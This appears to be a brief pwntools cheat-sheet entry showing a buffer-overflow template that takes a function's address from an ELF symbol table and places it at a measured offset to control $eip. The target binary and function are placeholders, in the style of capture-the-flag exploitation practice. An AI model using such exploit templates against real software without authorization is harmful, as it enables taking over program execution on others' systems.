pwntools
Memory Addresses of ELF Binary
- Find the address of a function and use it as the value that ends up in $eip
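from pwn import *

binary = "<binary>"                     # path to the target ELF
elf = context.binary = ELF(binary)      # sets the word size and endianness fit() packs with
p = process(binary)

# Address from the ELF symbol table (equals the runtime address only if the binary is not PIE)
__function = elf.symbols["<functionName>"]

payload = fit({
    42: __function  # Length measured via cyclic
})
p.sendline(payload)
p.interactive()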